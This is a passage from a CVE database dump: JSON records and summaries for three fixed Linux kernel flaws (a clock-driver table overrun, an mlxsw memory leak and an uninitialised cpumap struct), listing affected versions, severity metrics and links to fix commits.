"url": "https://git.kernel.org/stable/c/fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be9e2752d823eca1d5af67014a1844a9176ff566"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1040ef5ed95d6fd2628bad387d78a61633e09429"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26969",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:45:16.629888Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:44.899Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/gcc-ipq8074.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "83fe1bbd9e259ad109827ccfbfc2488e0dea8e94",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "851cc19bdb02556fb13629b3e4fef6f2bdb038fe",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "9de184d4e557d550fb0b7b833b676bda4f269e4f",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "dd92b159c506804ac57adf3742d9728298bb1255",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "b6b31b4c67ea6bd9222e5b73b330554c57f2f90d",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "be9e2752d823eca1d5af67014a1844a9176ff566",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
},
{
"lessThan": "1040ef5ed95d6fd2628bad387d78a61633e09429",
"status": "affected",
"version": "9607f6224b3966652ce3f4e620c4694df190b64a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/gcc-ipq8074.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: gcc-ipq8074: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:05.215Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e117c6e2d1617520f5f7d7f6f6b395f01d8b5a27"
},
{
"url": "https://git.kernel.org/stable/c/83fe1bbd9e259ad109827ccfbfc2488e0dea8e94"
},
{
"url": "https://git.kernel.org/stable/c/851cc19bdb02556fb13629b3e4fef6f2bdb038fe"
},
{
"url": "https://git.kernel.org/stable/c/9de184d4e557d550fb0b7b833b676bda4f269e4f"
},
{
"url": "https://git.kernel.org/stable/c/dd92b159c506804ac57adf3742d9728298bb1255"
},
{
"url": "https://git.kernel.org/stable/c/b6b31b4c67ea6bd9222e5b73b330554c57f2f90d"
},
{
"url": "https://git.kernel.org/stable/c/fc3ac2fcd0a7fad63eba1b359490a4b81720d0f9"
},
{
"url": "https://git.kernel.org/stable/c/be9e2752d823eca1d5af67014a1844a9176ff566"
},
{
"url": "https://git.kernel.org/stable/c/1040ef5ed95d6fd2628bad387d78a61633e09429"
}
],
"title": "clk: qcom: gcc-ipq8074: fix terminating of frequency table arrays",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26969",
"datePublished": "2024-05-01T05:19:50.580Z",
"dateReserved": "2024-02-19T14:20:24.202Z",
"dateUpdated": "2025-05-04T09:01:05.215Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35852 (GCVE-0-2024-35852)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work
The rehash delayed work is rescheduled with a delay if the number of
credits at end of the work is not negative as supposedly it means that
the migration ended. Otherwise, it is rescheduled immediately.
After "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during
rehash" the above is no longer accurate as a non-negative number of
credits is no longer indicative of the migration being done. It can also
happen if the work encountered an error in which case the migration will
resume the next time the work is scheduled.
The significance of the above is that it is possible for the work to be
pending and associated with hints that were allocated when the migration
started. This leads to the hints being leaked [1] when the work is
canceled while pending as part of ACL region dismantle.
Fix by freeing the hints if hints are associated with a work that was
canceled while pending.
Blame the original commit since the reliance on not having a pending
work associated with hints is fragile.
[1]
unreferenced object 0xffff88810e7c3000 (size 256):
comm "kworker/0:16", pid 176, jiffies 4295460353
hex dump (first 32 bytes):
00 30 95 11 81 88 ff ff 61 00 00 00 00 00 00 80 .0......a.......
00 00 61 00 40 00 00 00 00 00 00 00 04 00 00 00 ..a.@...........
backtrace (crc 2544ddb9):
[<00000000cf8cfab3>] kmalloc_trace+0x23f/0x2a0
[<000000004d9a1ad9>] objagg_hints_get+0x42/0x390
[<000000000b143cf3>] mlxsw_sp_acl_erp_rehash_hints_get+0xca/0x400
[<0000000059bdb60a>] mlxsw_sp_acl_tcam_vregion_rehash_work+0x868/0x1160
[<00000000e81fd734>] process_one_work+0x59c/0xf20
[<00000000ceee9e81>] worker_thread+0x799/0x12c0
[<00000000bda6fe39>] kthread+0x246/0x300
[<0000000070056d23>] ret_from_fork+0x34/0x70
[<00000000dea2b93e>] ret_from_fork_asm+0x1a/0x30
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35852",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T18:41:32.237249Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:10.715Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.279Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/51cefc9da400b953fee749c9e5d26cd4a2b5d758"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/857ed800133ffcfcee28582090b63b0cbb8ba59d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/63d814d93c5cce4c18284adc810028f28dca493f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5bfe7bf9656ed2633718388f12b7c38b86414a04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d72dd6fcd7886d0523afbab8b4a4b22d17addd7d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb4e2b70a7194b209fc7320bbf33b375f7114bd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "51cefc9da400b953fee749c9e5d26cd4a2b5d758",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "857ed800133ffcfcee28582090b63b0cbb8ba59d",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "63d814d93c5cce4c18284adc810028f28dca493f",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "5bfe7bf9656ed2633718388f12b7c38b86414a04",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "d72dd6fcd7886d0523afbab8b4a4b22d17addd7d",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
},
{
"lessThan": "fb4e2b70a7194b209fc7320bbf33b375f7114bd5",
"status": "affected",
"version": "c9c9af91f1d9a636aecc55302c792538e549a430",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work\n\nThe rehash delayed work is rescheduled with a delay if the number of\ncredits at end of the work is not negative as supposedly it means that\nthe migration ended. Otherwise, it is rescheduled immediately.\n\nAfter \"mlxsw: spectrum_acl_tcam: Fix possible use-after-free during\nrehash\" the above is no longer accurate as a non-negative number of\ncredits is no longer indicative of the migration being done. It can also\nhappen if the work encountered an error in which case the migration will\nresume the next time the work is scheduled.\n\nThe significance of the above is that it is possible for the work to be\npending and associated with hints that were allocated when the migration\nstarted. This leads to the hints being leaked [1] when the work is\ncanceled while pending as part of ACL region dismantle.\n\nFix by freeing the hints if hints are associated with a work that was\ncanceled while pending.\n\nBlame the original commit since the reliance on not having a pending\nwork associated with hints is fragile.\n\n[1]\nunreferenced object 0xffff88810e7c3000 (size 256):\n comm \"kworker/0:16\", pid 176, jiffies 4295460353\n hex dump (first 32 bytes):\n 00 30 95 11 81 88 ff ff 61 00 00 00 00 00 00 80 .0......a.......\n 00 00 61 00 40 00 00 00 00 00 00 00 04 00 00 00 ..a.@...........\n backtrace (crc 2544ddb9):\n [\u003c00000000cf8cfab3\u003e] kmalloc_trace+0x23f/0x2a0\n [\u003c000000004d9a1ad9\u003e] objagg_hints_get+0x42/0x390\n [\u003c000000000b143cf3\u003e] mlxsw_sp_acl_erp_rehash_hints_get+0xca/0x400\n [\u003c0000000059bdb60a\u003e] mlxsw_sp_acl_tcam_vregion_rehash_work+0x868/0x1160\n [\u003c00000000e81fd734\u003e] process_one_work+0x59c/0xf20\n [\u003c00000000ceee9e81\u003e] worker_thread+0x799/0x12c0\n [\u003c00000000bda6fe39\u003e] kthread+0x246/0x300\n [\u003c0000000070056d23\u003e] ret_from_fork+0x34/0x70\n [\u003c00000000dea2b93e\u003e] ret_from_fork_asm+0x1a/0x30"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:51.339Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/51cefc9da400b953fee749c9e5d26cd4a2b5d758"
},
{
"url": "https://git.kernel.org/stable/c/857ed800133ffcfcee28582090b63b0cbb8ba59d"
},
{
"url": "https://git.kernel.org/stable/c/63d814d93c5cce4c18284adc810028f28dca493f"
},
{
"url": "https://git.kernel.org/stable/c/5bfe7bf9656ed2633718388f12b7c38b86414a04"
},
{
"url": "https://git.kernel.org/stable/c/de1aaefa75be9d0ec19c9a3e0e2f9696de20c6ab"
},
{
"url": "https://git.kernel.org/stable/c/d72dd6fcd7886d0523afbab8b4a4b22d17addd7d"
},
{
"url": "https://git.kernel.org/stable/c/fb4e2b70a7194b209fc7320bbf33b375f7114bd5"
}
],
"title": "mlxsw: spectrum_acl_tcam: Fix memory leak when canceling rehash work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35852",
"datePublished": "2024-05-17T14:47:29.441Z",
"dateReserved": "2024-05-17T13:50:33.106Z",
"dateUpdated": "2025-05-04T09:06:51.339Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27431 (GCVE-0-2024-27431)
Vulnerability from cvelistv5
Published
2024-05-17 12:02
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
cpumap: Zero-initialise xdp_rxq_info struct before running XDP program
When running an XDP program that is attached to a cpumap entry, we don't
initialise the xdp_rxq_info data structure being used in the xdp_buff
that backs the XDP program invocation. Tobias noticed that this leads to
random values being returned as the xdp_md->rx_queue_index value for XDP
programs running in a cpumap.
This means we're basically returning the contents of the uninitialised
memory, which is bad. Fix this by zero-initialising the rxq data
structure before running the XDP program.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 Version: 9216477449f33cdbc9c9a99d49f500b7fbb81702 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "9216477449f3"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.9"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "0"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.10.213"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.15.152"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.1.82"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.6.22"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.7.10"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27431",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T16:29:06.840486Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-908",
"description": "CWE-908 Use of Uninitialized Resource",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-23T21:49:35.963Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.315Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f4e51abfbe6eb444fa91906a5cd083044278297"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0363af9619c77730764f10360e36c6445c12f7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f562e4c4aab00986dde3093c4be919c3f2b85a4a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eaa7cb836659ced2d9f814ac32aa3ec193803ed6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2487007aa3b9fafbd2cb14068f49791ce1d7ede5"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bpf/cpumap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5f4e51abfbe6eb444fa91906a5cd083044278297",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
},
{
"lessThan": "f0363af9619c77730764f10360e36c6445c12f7b",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
},
{
"lessThan": "3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
},
{
"lessThan": "f562e4c4aab00986dde3093c4be919c3f2b85a4a",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
},
{
"lessThan": "eaa7cb836659ced2d9f814ac32aa3ec193803ed6",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
},
{
"lessThan": "2487007aa3b9fafbd2cb14068f49791ce1d7ede5",
"status": "affected",
"version": "9216477449f33cdbc9c9a99d49f500b7fbb81702",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/bpf/cpumap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.152",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.82",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.22",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.213",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.152",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.82",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.22",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.10",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpumap: Zero-initialise xdp_rxq_info struct before running XDP program\n\nWhen running an XDP program that is attached to a cpumap entry, we don\u0027t\ninitialise the xdp_rxq_info data structure being used in the xdp_buff\nthat backs the XDP program invocation. Tobias noticed that this leads to\nrandom values being returned as the xdp_md-\u003erx_queue_index value for XDP\nprograms running in a cpumap.\n\nThis means we\u0027re basically returning the contents of the uninitialised\nmemory, which is bad. Fix this by zero-initialising the rxq data\nstructure before running the XDP program."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:51.900Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
